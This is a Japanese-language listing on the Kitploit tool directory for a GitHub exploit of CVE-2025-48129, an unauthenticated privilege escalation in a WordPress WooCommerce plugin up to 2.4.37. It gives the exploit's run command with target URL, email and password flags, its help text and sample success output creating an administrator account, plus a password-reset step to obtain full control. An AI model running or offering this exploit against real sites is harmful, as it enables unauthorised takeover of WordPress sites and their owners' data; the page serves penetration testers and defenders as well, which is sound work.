Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-48129 — WordPress Spreadsheet Price Changer for WooCommerce and WP E-commerce – Light Plugin <= 2.4.37 には Privilege Escalation の脆弱性があります | Kitploit
ツール/GitHubGitHub/nxploited/cve-2025-48129
特権昇格脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト認証
GitHubnxploited/cve-2025-48129

CVE-2025-48129

WordPress Spreadsheet Price Changer for WooCommerce and WP E-commerce – Light Plugin <= 2.4.37 には Privilege Escalation の脆弱性があります

リポジトリを見る
171年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🚨 CVE-2025-48129 - WordPress Spreadsheet Price Changer プラグインにおける権限昇格

🛡️ 脆弱性概要

  • 影響を受けるプラグイン: Spreadsheet Price Changer for WooCommerce and WP E-commerce – Light
  • 脆弱性のあるバージョン: <= 2.4.37
  • 修正バージョン: ❌ 公式の修正は未提供
  • 発見者: Patchstack | 2025年5月20日
  • CVE ID: CVE-2025-48129
  • CVSSスコア: 9.8 (Critical)
  • パッチ優先度: 🔴 高

🔥 リスク

認証されていない攻撃者は、事前アクセスなしに管理者レベルのアカウントを作成することで権限を昇格できます。これにより、WordPressサイトの完全な乗っ取りが可能になります。

分類: OWASP A7 – 識別と認証の失敗


🧪 エクスプロイトスクリプト概要

このPythonスクリプトは、脆弱性のあるバージョンのプラグインをターゲットとし、メールアドレスとパスワード(MD5でハッシュ化)のみを使用して新しいWordPress管理者を登録します。


▶️ 使用例

python CVE-2025-48129.py -u http://target-site.com/wordpress -mail [email protected] -p nxploitadmin

📘 使用方法ヘルプ

python CVE-2025-48129.py -help

usage: CVE-2025-48129.py [-h] -u URL -mail MAIL [-p PASSWORD]

CVE-2025-48129 - Unauthenticated Privilege Escalation Exploit by Khaled Alenazi (Nxploited)

options:
  -h, --help              show this help message and exit
  -u, --url URL           Target WordPress site URL (e.g., http://site.com/)
  -mail, --mail MAIL      Email for the new Admin account
  -p, --password PASSWORD Password to set (default: nxploitadmin)

✅ 成功出力例

[*] Checking plugin version...
[*] Plugin version: 2.4.37
[*] Vulnerable version detected. Exploiting...
[+] Exploitation successful!

[*] Login credentials:
    Username: [email protected]
    Password: 21232f297a57a5a743894a0e4a801fc3

[*] If login fails, reset the password manually via:
    http://target-site.com/wordpress/wp-login.php?action=lostpassword

⚠️ 重要な注意事項

場合によっては、選択したパスワードで直接ログインできないことがあります。
これはエクスプロイトのバグではなく、脆弱性のあるプラグインがハッシュ化されたパスワードをWordPressの内部ユーザー作成システムに渡す方法によるものです。

ログインできない場合は、以下のURLを使用してメールでパスワードをリセットしてください:

http://target-site.com/wordpress/wp-login.php?action=lostpassword

WordPressは、作成した管理者アカウントにパスワードリセットメールを送信し、完全なアクセス権を付与します。


🧾 法的免責事項

このツールは、教育目的および許可されたペネトレーションテスト目的でのみ提供されています。
作者は、このスクリプトの誤用または損害について一切の責任を負いません。


作成者: Nxploited (Khaled_alenazi)

ツールをダウンロード